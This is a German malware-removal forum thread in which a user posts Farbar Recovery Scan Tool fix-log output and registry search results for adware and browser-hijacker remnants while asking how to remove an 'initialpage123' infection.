05.06.2017  15:41    <DIR>          ..
05.11.2016  17:40    <DIR>          .android
16.05.2017  15:15    <DIR>          .gimp-2.8
30.07.2016  20:24    <DIR>          .oracle_jre_usage
07.03.2017  15:45    <DIR>          .thumbnails
12.10.2016  19:38    <DIR>          Contacts
19.03.2017  11:55    <DIR>          Creative Cloud Files
05.06.2017  17:30    <DIR>          Desktop
01.06.2017  21:59    <DIR>          Documents
02.06.2017  16:15    <DIR>          Downloads
05.06.2017  15:25    <DIR>          Favorites
01.04.2017  11:21    <DIR>          Links
07.06.2017  10:34    <DIR>          Music
07.06.2017  10:38    <DIR>          OneDrive
24.05.2017  10:24    <DIR>          Pictures
26.05.2017  18:06    <DIR>          Saved Games
29.01.2017  20:13    <DIR>          Searches
23.11.2016  18:13    <DIR>          Start Menu
22.12.2016  15:58    <DIR>          synthesia lieder
15.06.2016  11:33    <DIR>          Tracing
26.05.2017  10:53    <DIR>          Videos
               0 Datei(en),              0 Bytes
              22 Verzeichnis(se), 825.262.882.816 Bytes frei

========= Ende von CMD: =========


========= dir "C:\" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\

05.06.2017  15:51    <DIR>          AdwCleaner
31.07.2016  16:26                 0 autoexec.bat
31.07.2016  16:09    <DIR>          DAC5
04.04.2017  01:30                 0 dfu.log
28.02.2017  20:37    <DIR>          FreeOCR
07.06.2017  10:43    <DIR>          FRST
03.06.2017  19:08    <DIR>          Games
12.04.2017  11:06    <DIR>          Intel
02.12.2006  00:37           904.704 msdia80.dll
18.11.2016  18:57    <DIR>          PerfLogs
05.06.2017  15:57    <DIR>          Program Files
07.06.2017  10:41    <DIR>          Program Files (x86)
16.11.2016  18:46                 0 temp.dat
01.04.2017  12:12    <DIR>          Users
05.06.2017  17:04    <DIR>          Windows
               4 Datei(en),        904.704 Bytes
              11 Verzeichnis(se), 825.262.829.568 Bytes frei

========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17789342 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 185497 B
Edge => 0 B
Chrome => 6949128 B
Firefox => 3002692 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 9756 B
NetworkService => 0 B
Nick Schuster => 33693854 B

RecycleBin => 0 B
EmptyTemp: => 58.8 MB tempor鋜e Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 10:43:47 ====
         

Alt 07.06.2017, 11:48   #12
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Code:
ATTFilter
Farbar Recovery Scan Tool (x64) Version: 05-06-2017
durchgef黨rt von Nick Schuster (07-06-2017 10:54:47)
Gestartet von C:\Users\Nick Schuster\Desktop\anti trojan\killer.exe
Start-Modus: Normal

================== Registry-Suche: "SwytShop;Interstat;Plumbytes;KUAIZIP;initialsite123;Speedownloader;Socia2Sear;EnigmaSoftwareGroup;HDWallpaper;AppTrailers;WiperSoft;DownloadProtect;SpyHunter;betterads;amule;OtherSearch;System Healer;ZipTool;iSafe;Softlink;AdvinstAnalytics;gplyra;Qizsywosale Core;Phucusy;Anerpe;Grerdaentlerveck;Minerent;ourluckysites;trotux;Everness;ProxyGate;Elex-tech;Applemy;Minerent;Arucerther;AdvinstAnalytics;Cerzaentfisuge;ttwifi;Quick Tharks Screen Saver;SoftUpgrade;devnull;Grerdaentlerveck;Draveingplererward;VideoMemoryDiagnostic;Prfasaretaly;pccleanplus;Babylon;terana;CSHMDR;CWASRE;NPASRE;VNASRE;ANSARE;background_fault;WANARE;SNAREA;SNARE;SNARER;Yeshat;BrowserModule;Kyubey;BikaQRss;WinSAPSvc;Mikghbiritain" ===========


===================== Suchergebnis f黵 "Interstat" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DB49BBEB-C744-49F8-81AC-AF97669D4CB0}]
""="PrinterStatusHTMLViewExtension Class"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DB49BBEB-C744-49F8-81AC-AF97669D4CB0}]
""="PrinterStatusHTMLViewExtension Class"

[HKEY_USERS\.DEFAULT\Software\Classes\Applications\interstatnogui.exe]

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Users\Nick Schuster\AppData\Roaming\InterStat\interstat.exe"="0x5341435001000000000000000700000028000000301F2E00410D2F0001000000000000000000030600210000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000E00E0100000000000200000002000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\NetCtl]
"original"="Interstatnogui"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\ActivatableClasses\CLSID\{C6088F97-CEEA-5089-ABB2-5BED3E25756E}]
"ActivatableClassId"="Canon.IJ.IJPU.PrinterStatusNotifier"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\ActivatableClasses\Package\34791E63.CanonInkjetPrintUtility_2.6.0.5_neutral__6e5tt8cgb93ep\ActivatableClassId\Canon.IJ.IJPU.PrinterStatusNotifier]


===================== Suchergebnis f黵 "Plumbytes" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\Plumbytes.exe]

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files\Plumbytes Software\Plumbytes Anti-Malware\Plumbytes.exe"="0x5341435001000000000000000700000028000000105922005C812200010000000000000000000306F3220000B395E7CF049FCE0100000000000000000200000028000000000000000000000000000000000000000000000000000000907F9400000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files\Plumbytes Software\Plumbytes Anti-Malware\uninstall.exe"="0x53414350010000000000000007000000280000005B030300D1EA460101000000000000000000010600010000975FD891C99ECE01000000000000000002000000280000000000000000000040000000000000000000000000000000008C920000000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Plumbytes Software\Plumbytes Anti-Malware\Plumbytes.exe.FriendlyAppName"="Plumbytes"


===================== Suchergebnis f黵 "KUAIZIP" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"KuaiZip Shell Extension"="{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts]
"KuaiZip.rar_.rar"="0"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts]
"KuaiZip.zip_.zip"="0"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts]
"KuaiZip.jar_.jar"="0"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.iso\OpenWithProgids]
"KuaiZipMount.iso"=""

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jar\OpenWithProgids]
"KuaiZip.jar"=""

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rar\OpenWithProgids]
"KuaiZip.rar"=""

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files\快压\X86\KuaiZip.exe"="0x5341435001000000000000000700000028000000C0E9150045D9160001000000000000000000030671220000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000DA080000000000000100000001000000"


===================== Suchergebnis f黵 "Speedownloader" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\5ritFihZeyda]
"product"="speedownloader"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\SpeeDownloader\uninstaller.exe"="0x53414350010000000000000007000000280000000026130000000000030000000000000000000306F5220000B395E7CF049FCE0100000000000000000100000004000000010000000500000010000000000000000000000000000000000000000200000050000000000000000000004000008000000000000000800000000000F5200000000000000200000002000000000000000000000000000000000000000000000000000000E02E0000000000000100000000000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Wow6432Node\Speedownloader0099]


===================== Suchergebnis f黵 "HDWallpaper" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\HDWallPaper\unins000.exe"="0x5341435001000000000000000700000028000000C97E12000000000003000000000000000000030600210000975FD891C99ECE010000000000000000020000002800000000000000000000000000000000000000000000000000000021120000000000000100000001000000"


===================== Suchergebnis f黵 "AppTrailers" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Users\Nick Schuster\AppData\Roaming\AppTrailers\Uninstall.exe"="0x5341435001000000000000000700000028000000BE3507000498BC0103000000000000000000010600010000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000DA150000000000000100000001000000"


===================== Suchergebnis f黵 "WiperSoft" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Users\Nick Schuster\Desktop\WiperSoft-installer.exe"="0x534143500100000000000000070000002800000028361E0005041F0001000000000000000000030600210000975FD891C99ECE010000000000000000020000002800000000000000000000000000000000000000000000000000000036126800000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files\WiperSoft\WiperSoft-inst.exe"="0x534143500100000000000000070000002800000028361E0005041F0001000000000000000000030600210000975FD891C99ECE01000000000000000002000000280000000000000000000000000000000000000000000000000000009C490000000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"SIGN.IE=01E3628 WiperSoft-installer.exe"="0x534143500100000000000000070000002800000028361E0005041F0001000000000000000000030600210000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000540C0000000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Users\Nick Schuster\Downloads\WiperSoft-installer.exe"="0x534143500100000000000000070000002800000028361E0005041F0001000000000000000000030600210000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000F1581300000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\WiperSoft\WiperSoft.exe.FriendlyAppName"="WiperSoft"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\WiperSoft\WiperSoft.exe.ApplicationCompany"="WiperSoft"


===================== Suchergebnis f黵 "SpyHunter" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\SpyHunter4.exe]

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"SIGN.IE=046E650 Spyhunter 4 Crack.exe"="0x534143500100000000000000070000002800000050E6460036E0460001000000000000000000030600210000975FD891C99ECE01000000000000000002000000280000000000000000000040000000000000000000000000000000008BA66400000000000200000002000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"SIGN.IE=035A6B0 SpyHunter-Installer.exe"="0x5341435001000000000000000700000028000000B0A635008DA9350001000000000000000000030600210000975FD891C99ECE0100000000000000000200000028000000000000000000004000000000000000000000000000000000E9170E00000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="0x5341435001000000000000000700000028000000A8047D00E4B17D0001000000000000000000030600210000975FD891C99ECE01000000000000000002000000280000000000000000000040000000000000000000000000000000004061AA00000000000D0000000D000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe.FriendlyAppName"="SpyHunter4 application"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe.ApplicationCompany"="Enigma Software Group USA, LLC."


===================== Suchergebnis f黵 "amule" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\ProgramData\ChelfNotify\_SSpm\amule.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE010000000000000000020000002800000000000000000000000000000000000000000000000000000062140000000000000200000002000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Windows\Temp\oua2BBB.tmp\amule.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000AD050000000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\programdata\winsapsvc\winsap_update\amule.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000640C0000000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Windows\Temp\winsap_update\amule.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE010000000000000000020000002800000000000000000000000000000000000000000000000000000059130000000000000200000002000000"


===================== Suchergebnis f黵 "OtherSearch" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\OtherSearch\uninstall.exe"="0x534143500100000000000000070000002800000055F000000000000003000000000000000000010600010000975FD891C99ECE01000000000000000002000000280000000000000000000000000000000000000000000000000000006E410000000000000100000001000000"


===================== Suchergebnis f黵 "ZipTool" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts]
"ZipTool.zip_.zip"="0"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts]
"ZipTool.cab_.cab"="0"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\OpenWithProgids]
"ZipTool.cab"=""

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids]
"ZipTool.zip"=""

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files\ZipTool\ZipTool.exe"="0x5341435001000000000000000700000028000000A03F1000622F110001000000000000000000030673220000B395E7CF049FCE01000000000000000002000000280000000000000000000000000000000000000000000000000000003A060000000000000200000002000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files\ZipTool\Uninstall.exe"="0x534143500100000000000000070000002800000000BE07000000000003000000000000000000030600210000975FD891C99ECE010000000000000000020000002800000000000000000000000000000000000000000000000000000022310000000000000400000004000000"


===================== Suchergebnis f黵 "iSafe" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{03C3860D-86B7-4F36-924C-3B1AD93B4C79}]
""="ISafeReportItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A95BE2D-1543-46BE-AD6D-18653034BF87}]
""="ISafeMailItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3120A5E4-552D-4EDF-8C48-70C5D5FF22D2}]
""="ISafeContactItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{31CE2164-4D5C-4508-BCA7-B10E11D08E6B}]
""="ISafeMAPIFolder"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{35EFAD55-134A-47BF-912A-44A9D9FD556F}]
""="ISafeAppointmentItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{5C61669E-F0CE-4126-B365-316588E6228F}]
""="ISafeRecipient"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6A5D680A-8F9F-4752-A056-2C0273F60B4E}]
""="ISafePostItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6E4C6020-2932-4DDD-BDA8-998AE4CDF50D}]
""="ISafeInspector"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BB94DAAD-7836-4D62-9557-2A7B83839B7B}]
""="ISafeSaveHandleManager"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{CACB61E0-AEEA-404D-88E1-7F3BCA8B8726}]
""="ISafeRecipients"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{CD5B9523-6EAF-4D63-8FE8-C081C51D1673}]
""="ISafeTable"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D7E6FB7C-A22F-4A9D-A89D-653D1AA37324}]
""="ISafeCurrentUser"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D80AC53D-E102-4A55-A265-529A626515E5}]
""="ISafeItems"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{DBCAD616-BFD4-4C72-8D87-C5926921D378}]
""="_ISafeItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E3EC74BB-5522-462D-A00F-2728C53FCA04}]
""="ISafeJournalItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EBB4EBA9-D546-4C85-A05A-167BF875FB83}]
""="ISafeDistList"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F7919641-3978-4668-8388-7310329C800E}]
""="ISafeMeetingItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F961CE9D-AE2B-4CFB-887C-3A055FF685C9}]
""="ISafeTaskItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{03C3860D-86B7-4F36-924C-3B1AD93B4C79}]
""="ISafeReportItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A95BE2D-1543-46BE-AD6D-18653034BF87}]
""="ISafeMailItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3120A5E4-552D-4EDF-8C48-70C5D5FF22D2}]
""="ISafeContactItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{31CE2164-4D5C-4508-BCA7-B10E11D08E6B}]
""="ISafeMAPIFolder"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{35EFAD55-134A-47BF-912A-44A9D9FD556F}]
""="ISafeAppointmentItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5C61669E-F0CE-4126-B365-316588E6228F}]
""="ISafeRecipient"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6A5D680A-8F9F-4752-A056-2C0273F60B4E}]
""="ISafePostItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6E4C6020-2932-4DDD-BDA8-998AE4CDF50D}]
""="ISafeInspector"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BB94DAAD-7836-4D62-9557-2A7B83839B7B}]
""="ISafeSaveHandleManager"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{CACB61E0-AEEA-404D-88E1-7F3BCA8B8726}]
""="ISafeRecipients"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{CD5B9523-6EAF-4D63-8FE8-C081C51D1673}]
""="ISafeTable"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D7E6FB7C-A22F-4A9D-A89D-653D1AA37324}]
""="ISafeCurrentUser"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D80AC53D-E102-4A55-A265-529A626515E5}]
""="ISafeItems"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DBCAD616-BFD4-4C72-8D87-C5926921D378}]
""="_ISafeItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3EC74BB-5522-462D-A00F-2728C53FCA04}]
""="ISafeJournalItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EBB4EBA9-D546-4C85-A05A-167BF875FB83}]
""="ISafeDistList"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F7919641-3978-4668-8388-7310329C800E}]
""="ISafeMeetingItem"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F961CE9D-AE2B-4CFB-887C-3A055FF685C9}]
""="ISafeTaskItem"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot]
"ProgramPath"="C:\Program Files (x86)\Elex-tech\YAC"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe"="0x5341435001000000000000000700000028000000D0FF01002EC5020001000000000000000000030671220000975FD891C99ECE01000000000000000005000000100000000000000000000000000000000000000002000000280000000000000000000000000000000000000000000000000000004D220000000000000200000002000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Elex-tech\YAC\iSafeTHlp.exe"="0x5341435001000000000000000700000028000000B8830600725A070001000000000000000000030671220000975FD891C99ECE010000000000000000050000001000000000000000000000000000000000000000020000002800000000000000000000000000000000000000000000000000000056460200000000000200000002000000"


===================== Suchergebnis f黵 "Phucusy" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5EBD559E-A5BA-11E6-B9FD-64006A5CFC23}\InProcServer32]
""="C:\Users\Nick Schuster\AppData\Roaming\Phucusy\Pipothzo.dll"


===================== Suchergebnis f黵 "Anerpe" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C829CE8-039A-11E7-8F7F-64006A5CFC23}\InProcServer32]
""="C:\Users\Nick Schuster\AppData\Roaming\Anerpe\Zoduly.dll"


===================== Suchergebnis f黵 "Grerdaentlerveck" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{234628B4-4048-11E7-9F2C-64006A5CFC23}\InProcServer32]
""="C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck\Thuvale.dll"


===================== Suchergebnis f黵 "Minerent" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4CD8824-4049-11E7-9F11-64006A5CFC23}\InProcServer32]
""="C:\Users\Default\AppData\Roaming\Minerent\Wuteghtplejipy.dll"


===================== Suchergebnis f黵 "ourluckysites" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP]
"DoNotAskAgain"="www.ourluckysites.com"


===================== Suchergebnis f黵 "Everness" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness]
"path"="C:\Program Files (x86)\Everness\"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Everness]

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\5dd36cc3_0]
""="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0269&subsys_1b0a2256&rev_1002#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\espeakertopo/00010001
\Device\HarddiskVolume3\Program Files (x86)\Everness\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000}"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Everness\Application\chrome.exe"="0x5341435001000000000000000700000028000000585F0E0077AC0E0001000000000000000000030600210000975FD891C99ECE010000000100000000"


===================== Suchergebnis f黵 "ProxyGate" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3bbe95d4-c53f-11d1-b3a2-00a0c9083365}]
""="ITipProxyGatewaySink"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3bbe95d5-c53f-11d1-b3a2-00a0c9083365}]
""="ITipProxyGateway"


===================== Suchergebnis f黵 "Elex-tech" ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot]
"ProgramPath"="C:\Program Files (x86)\Elex-tech\YAC"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe"="0x5341435001000000000000000700000028000000D0FF01002EC5020001000000000000000000030671220000975FD891C99ECE01000000000000000005000000100000000000000000000000000000000000000002000000280000000000000000000000000000000000000000000000000000004D220000000000000200000002000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Elex-tech\YAC\iSafeTHlp.exe"="0x5341435001000000000000000700000028000000B8830600725A070001000000000000000000030671220000975FD891C99ECE010000000000000000050000001000000000000000000000000000000000000000020000002800000000000000000000000000000000000000000000000000000056460200000000000200000002000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Elex-tech\YAC\uninstall.exe"="0x5341435001000000000000000700000028000000C08410009E23110003000000000000000000010600010000975FD891C99ECE01000000000000000002000000280000000000000000000000000000000000000000000000000000004DFC0100000000000200000002000000"


===================== Suchergebnis f黵 "Applemy" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Applemy]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Applemy]
"path"="C:\Program Files (x86)\Applemy\"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Applemy\Application\chrome.exe"="0x534143500100000000000000070000002800000058E50E0095D30F0001000000000000000000030600210000975FD891C99ECE010000000100000000"


===================== Suchergebnis f黵 "Minerent" ==========

